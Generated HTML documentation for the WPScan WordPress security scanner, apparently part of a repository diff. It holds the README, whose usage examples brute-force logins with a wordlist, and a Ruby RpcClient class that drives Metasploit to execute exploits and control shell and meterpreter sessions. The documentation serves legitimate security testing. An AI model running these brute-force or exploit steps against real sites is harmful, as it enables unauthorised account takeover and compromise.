<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<p><em>__</em></p>
<pre>__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|</pre>
<p><em>__</em></p>
<h2>LICENSE==</h2>
<p>WPScan - WordPress Security Scanner Copyright (C) 2011 Ryan Dewhurst AKA
ethicalhack3r</p>
<p>This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the Free
Software Foundation, either version 3 of the License, or (at your option)
any later version.</p>
<p>This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
more details.</p>
<p>You should have received a copy of the GNU General Public License along
with this program. If not, see &lt;<a
href="http://www.gnu.org/licenses/">www.gnu.org/licenses/</a>&gt;.</p>
<p>ryandewhurst at gmail</p>
<h2>INSTALL==</h2>
<p>WPScan comes pre-installed on BackTrack5 R1 in the /pentest/web/wpscan
directory. WPScan only supports Ruby =&gt; 1.9.</p>
<pre>-&gt; Installing on Backtrack5 Gnome/KDE 32bit :
sudo apt-get install libcurl4-gnutls-dev
sudo gem install --user-install mime-types typhoeus nokogiri json
-&gt; Installing on Debian/Ubuntu :
sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby
sudo gem install typhoeus nokogiri json
-&gt; Installing on other nix : (not tested)
sudo gem install typhoeus nokogiri json
-&gt; Installing on Windows : (not tested)
gem install typhoeus (&quot;Windows is not officially supported&quot;)
gem install nokogiri json
-&gt; Installing on Mac OSX :
sudo gem install typhoeus nokogiri json</pre>
<h2>KNOWN ISSUES==</h2>
<pre>- Typhoeus segmentation fault
Update curl to at least v7.21 (you may have to install it from sources)
See http://code.google.com/p/wpscan/issues/detail?id=81
- If you have one the following errors : &quot;-bash: !t: event not found&quot;, &quot;-bash: !u: event not found&quot;
It happens with enumeration : just put the 't' or 'u' before the 'p!' : '-e tp!' instead of '-e p!t'</pre>
<h2>WPSCAN ARGUMENTS==</h2>
<p>update Update to the latest revision</p>
<p>url | -u &lt;target url&gt; The WordPress URL/domain to scan.</p>
<p>force | -f Forces WPScan to not check if the remote site is running
WordPress.</p>
<p>enumerate | -e [option(s)] Enumeration.</p>
<pre>option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
p! only vulnerable plugins
t timthumbs
Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins
If no option is supplied, the default is 'tup!'</pre>
<p>config-file | -c &lt;config file&gt; Use the specified config file</p>
<p>follow-redirection If the target url has a redirection, it will be
followed without asking if you wanted to do so or not</p>
<p>wp-content-dir &lt;wp content dir&gt; WPScan try to find the content
directory (ie wp-content) by scanning the index page, however you can
specified it. Subdirectories are allowed</p>
<p>wp-plugins-dir &lt;wp plugins dir&gt; Same thing than wp-content-dir but
for the plugins directory. If not supplied, WPScan will use
wp-content-dir/plugins. Subdirectories are allowed</p>
<p>proxy Supply a proxy in the format host:port or protocol://host:port
(will override the one from conf/browser.conf.json). HTTP, SOCKS4 SOCKS4A
and SOCKS5 are supported. If no protocol is given (format host:port), HTTP
will be used</p>
<p>wordlist | -w &lt;wordlist&gt; Supply a wordlist for the password bruter
and do the brute.</p>
<p>threads | -t &lt;number of threads&gt; The number of threads to use when
multi-threading requests. (will override the value from
conf/browser.conf.json)</p>
<p>username | -U &lt;username&gt; Only brute force the supplied username.</p>
<p>help | -h This help screen.</p>
<p>verbose | -v Verbose output.</p>
<h2>WPSCAN EXAMPLES==</h2>
<p>Do non-intrusive checks…</p>
<pre>ruby wpscan.rb --url www.example.com</pre>
<p>Do wordlist password brute force on enumerated users using 50 threads…</p>
<pre>ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50</pre>
<p>Do wordlist password brute force on the admin username only…</p>
<pre>ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin</pre>
<p>Enumerate instaled plugins…</p>
<pre>ruby wpscan.rb --url www.example.com --enumerate p</pre>
<h2>WPSTOOLS ARGUMENTS==</h2>
<p>help | -h This help screen. Verbose | -v Verbose output. update
| -u Update to the latest revision. generate_plugin_list [number of
pages] Generate a new data/plugins.txt file. (supply number of
<b>pages</b> to parse, default : 150) gpl Alias for generate_plugin_list</p>
<h2>WPSTOOLS EXAMPLES==</h2>
<ul><li>
<p>Generate a new most popular plugin list, up to 150 pages …</p>
</li></ul>
<p>ruby <a href="wpstools_rb.html">wpstools.rb</a> generate_plugin_list 150</p>
<h3>PROJECT HOME===</h3>
<p><a href="http://www.wpscan.org">www.wpscan.org</a></p>
<h3>REPOSITORY===</h3>
<p><a
href="https://github.com/wpscanteam/wpscan">github.com/wpscanteam/wpscan</a></p>
<h3>ISSUES===</h3>
<p><a
href="https://github.com/wpscanteam/wpscan/issues">github.com/wpscanteam/wpscan/issues</a></p>
<h3>SPONSOR===</h3>
<p>WPScan is sponsored by the RandomStorm Open Source Initiative.</p>
<p>Visit RandomStorm at <a
href="http://www.randomstorm.com">www.randomstorm.com</a></p>
</div>
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

762
doc/RpcClient.html Normal file
View File

@@ -0,0 +1,762 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: RpcClient</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/msfrpc_client_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/msfrpc_client.rb">lib/wpscan/msfrpc_client.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-i-authenticate">#authenticate</a></li>
<li><a href="#method-i-exploit">#exploit</a></li>
<li><a href="#method-i-get_exploit_info">#get_exploit_info</a></li>
<li><a href="#method-i-get_options">#get_options</a></li>
<li><a href="#method-i-get_payloads">#get_payloads</a></li>
<li><a href="#method-i-jobs">#jobs</a></li>
<li><a href="#method-i-kill_session">#kill_session</a></li>
<li><a href="#method-i-login">#login</a></li>
<li><a href="#method-i-meterpreter_read">#meterpreter_read</a></li>
<li><a href="#method-i-meterpreter_write">#meterpreter_write</a></li>
<li><a href="#method-i-read_shell">#read_shell</a></li>
<li><a href="#method-i-sessions">#sessions</a></li>
<li><a href="#method-i-write_shell">#write_shell</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">RpcClient</h1>
<div id="description" class="description">
<p>This library should contain all methods to communicate with msfrpc. See
framework/documentation/msfrpc.txt for further information. msfrpcd -S -U
wpscan -P wpscan -f -t Web -u /RPC2 name = exploit/unix/webapp/php_include</p>
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 28</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>
<span class="ruby-ivar">@config</span> = {}
<span class="ruby-ivar">@config</span>[<span class="ruby-string">'host'</span>] = <span class="ruby-string">&quot;127.0.0.1&quot;</span>
<span class="ruby-ivar">@config</span>[<span class="ruby-string">'path'</span>] = <span class="ruby-string">&quot;/RPC2&quot;</span>
<span class="ruby-ivar">@config</span>[<span class="ruby-string">'port'</span>] = <span class="ruby-value">55553</span>
<span class="ruby-ivar">@config</span>[<span class="ruby-string">'user'</span>] = <span class="ruby-string">&quot;wpscan&quot;</span>
<span class="ruby-ivar">@config</span>[<span class="ruby-string">'pass'</span>] = <span class="ruby-string">&quot;wpscan&quot;</span>
<span class="ruby-ivar">@auth_token</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-ivar">@last_auth</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">begin</span>
<span class="ruby-ivar">@server</span> = <span class="ruby-constant">XMLRPC</span><span class="ruby-operator">::</span><span class="ruby-constant">Client</span>.<span class="ruby-identifier">new3</span>( <span class="ruby-value">:host</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@config</span>[<span class="ruby-string">&quot;host&quot;</span>], <span class="ruby-value">:path</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@config</span>[<span class="ruby-string">&quot;path&quot;</span>], <span class="ruby-value">:port</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@config</span>[<span class="ruby-string">&quot;port&quot;</span>], <span class="ruby-value">:user</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@config</span>[<span class="ruby-string">&quot;user&quot;</span>], <span class="ruby-value">:password</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@config</span>[<span class="ruby-string">&quot;pass&quot;</span>])
<span class="ruby-keyword">rescue</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">e</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[ERROR] Could not create XMLRPC object.&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">e</span>.<span class="ruby-identifier">faultCode</span>
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">e</span>.<span class="ruby-identifier">faultString</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="authenticate-method" class="method-detail ">
<a name="method-i-authenticate"></a>
<div class="method-heading">
<span class="method-name">authenticate</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>check authentication</p>
<div class="method-source-code" id="authenticate-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 65</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">authenticate</span>()
<span class="ruby-identifier">login</span>() <span class="ruby-keyword">if</span> <span class="ruby-ivar">@auth_token</span>.<span class="ruby-identifier">nil?</span>
<span class="ruby-identifier">login</span>() <span class="ruby-keyword">if</span> (<span class="ruby-constant">Time</span>.<span class="ruby-identifier">now</span> <span class="ruby-operator">-</span> <span class="ruby-ivar">@last_auth</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">600</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- authenticate-source -->
</div>
</div><!-- authenticate-method -->
<div id="exploit-method" class="method-detail ">
<a name="method-i-exploit"></a>
<div class="method-heading">
<span class="method-name">exploit</span><span
class="method-args">(name, opts)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>execute exploit</p>
<div class="method-source-code" id="exploit-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 93</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">exploit</span>(<span class="ruby-identifier">name</span>, <span class="ruby-identifier">opts</span>)
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'module.execute'</span>, <span class="ruby-ivar">@auth_token</span>, <span class="ruby-string">'exploit'</span>, <span class="ruby-identifier">name</span>, <span class="ruby-identifier">opts</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- exploit-source -->
</div>
</div><!-- exploit-method -->
<div id="get_exploit_info-method" class="method-detail ">
<a name="method-i-get_exploit_info"></a>
<div class="method-heading">
<span class="method-name">get_exploit_info</span><span
class="method-args">(name)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>retrieve information about the exploit</p>
<div class="method-source-code" id="get_exploit_info-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 72</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_exploit_info</span>(<span class="ruby-identifier">name</span>)
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'module.info'</span>, <span class="ruby-ivar">@auth_token</span>, <span class="ruby-string">'exploit'</span>, <span class="ruby-identifier">name</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- get_exploit_info-source -->
</div>
</div><!-- get_exploit_info-method -->
<div id="get_options-method" class="method-detail ">
<a name="method-i-get_options"></a>
<div class="method-heading">
<span class="method-name">get_options</span><span
class="method-args">(name)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>retrieve exploit options</p>
<div class="method-source-code" id="get_options-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 79</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_options</span>(<span class="ruby-identifier">name</span>)
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'module.options'</span>, <span class="ruby-ivar">@auth_token</span>, <span class="ruby-string">'exploit'</span>,<span class="ruby-identifier">name</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- get_options-source -->
</div>
</div><!-- get_options-method -->
<div id="get_payloads-method" class="method-detail ">
<a name="method-i-get_payloads"></a>
<div class="method-heading">
<span class="method-name">get_payloads</span><span
class="method-args">(name)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>retrieve the exploit payloads</p>
<div class="method-source-code" id="get_payloads-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 86</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_payloads</span>(<span class="ruby-identifier">name</span>)
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'module.compatible_payloads'</span>, <span class="ruby-ivar">@auth_token</span>, <span class="ruby-identifier">name</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- get_payloads-source -->
</div>
</div><!-- get_payloads-method -->
<div id="jobs-method" class="method-detail ">
<a name="method-i-jobs"></a>
<div class="method-heading">
<span class="method-name">jobs</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>list msf jobs</p>
<div class="method-source-code" id="jobs-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 100</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">jobs</span>()
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'job.list'</span>, <span class="ruby-ivar">@auth_token</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- jobs-source -->
</div>
</div><!-- jobs-method -->
<div id="kill_session-method" class="method-detail ">
<a name="method-i-kill_session"></a>
<div class="method-heading">
<span class="method-name">kill_session</span><span
class="method-args">(id)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>kill msf session</p>
<div class="method-source-code" id="kill_session-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 114</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">kill_session</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'session.stop'</span>, <span class="ruby-ivar">@auth_token</span>, <span class="ruby-identifier">id</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- kill_session-source -->
</div>
</div><!-- kill_session-method -->
<div id="login-method" class="method-detail ">
<a name="method-i-login"></a>
<div class="method-heading">
<span class="method-name">login</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>login to msfrpcd</p>
<div class="method-source-code" id="login-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 49</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">login</span>()
<span class="ruby-identifier">result</span> = <span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">&quot;auth.login&quot;</span>, <span class="ruby-ivar">@config</span>[<span class="ruby-string">'user'</span>], <span class="ruby-ivar">@config</span>[<span class="ruby-string">'pass'</span>])
<span class="ruby-keyword">if</span> <span class="ruby-identifier">result</span>[<span class="ruby-string">'result'</span>] <span class="ruby-operator">==</span> <span class="ruby-string">&quot;success&quot;</span>
<span class="ruby-ivar">@auth_token</span> = <span class="ruby-identifier">result</span>[<span class="ruby-string">'token'</span>]
<span class="ruby-ivar">@last_auth</span> = <span class="ruby-constant">Time</span>.<span class="ruby-identifier">new</span>
<span class="ruby-identifier">logged_in</span> = <span class="ruby-keyword">true</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[ERROR] Invalid login credentials provided to msfrpcd.&quot;</span>
<span class="ruby-identifier">logged_in</span> = <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- login-source -->
</div>
</div><!-- login-method -->
<div id="meterpreter_read-method" class="method-detail ">
<a name="method-i-meterpreter_read"></a>
<div class="method-heading">
<span class="method-name">meterpreter_read</span><span
class="method-args">(id)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="meterpreter_read-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 133</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">meterpreter_read</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'session.meterpreter_read'</span>, <span class="ruby-ivar">@auth_token</span>, <span class="ruby-identifier">id</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- meterpreter_read-source -->
</div>
</div><!-- meterpreter_read-method -->
<div id="meterpreter_write-method" class="method-detail ">
<a name="method-i-meterpreter_write"></a>
<div class="method-heading">
<span class="method-name">meterpreter_write</span><span
class="method-args">(id, data)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="meterpreter_write-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 138</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">meterpreter_write</span>(<span class="ruby-identifier">id</span>, <span class="ruby-identifier">data</span>)
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'session.meterpreter_write'</span>, <span class="ruby-ivar">@auth_token</span>, <span class="ruby-identifier">id</span>, <span class="ruby-identifier">data</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- meterpreter_write-source -->
</div>
</div><!-- meterpreter_write-method -->
<div id="read_shell-method" class="method-detail ">
<a name="method-i-read_shell"></a>
<div class="method-heading">
<span class="method-name">read_shell</span><span
class="method-args">(id)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>reads any pending output from session</p>
<div class="method-source-code" id="read_shell-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 121</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">read_shell</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'session.shell_read'</span>, <span class="ruby-ivar">@auth_token</span>, <span class="ruby-identifier">id</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- read_shell-source -->
</div>
</div><!-- read_shell-method -->
<div id="sessions-method" class="method-detail ">
<a name="method-i-sessions"></a>
<div class="method-heading">
<span class="method-name">sessions</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>list msf sessions</p>
<div class="method-source-code" id="sessions-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 107</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">sessions</span>()
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'session.list'</span>, <span class="ruby-ivar">@auth_token</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- sessions-source -->
</div>
</div><!-- sessions-method -->
<div id="write_shell-method" class="method-detail ">
<a name="method-i-write_shell"></a>
<div class="method-heading">
<span class="method-name">write_shell</span><span
class="method-args">(id, data)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>writes the specified input into the session</p>
<div class="method-source-code" id="write_shell-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/msfrpc_client.rb, line 128</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">write_shell</span>(<span class="ruby-identifier">id</span>, <span class="ruby-identifier">data</span>)
<span class="ruby-identifier">authenticate</span>()
<span class="ruby-ivar">@server</span>.<span class="ruby-identifier">call</span>(<span class="ruby-string">'session.shell_write'</span>, <span class="ruby-ivar">@auth_token</span>, <span class="ruby-identifier">id</span>, <span class="ruby-identifier">data</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- write_shell-source -->
</div>
</div><!-- write_shell-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

349
doc/SvnUpdater.html Normal file
View File

@@ -0,0 +1,349 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: SvnUpdater</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/updater/svn_updater_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/updater/svn_updater.rb">lib/updater/svn_updater.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Updater.html">Updater</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-is_installed-3F">#is_installed?</a></li>
<li><a href="#method-i-local_revision_number">#local_revision_number</a></li>
<li><a href="#method-i-update">#update</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
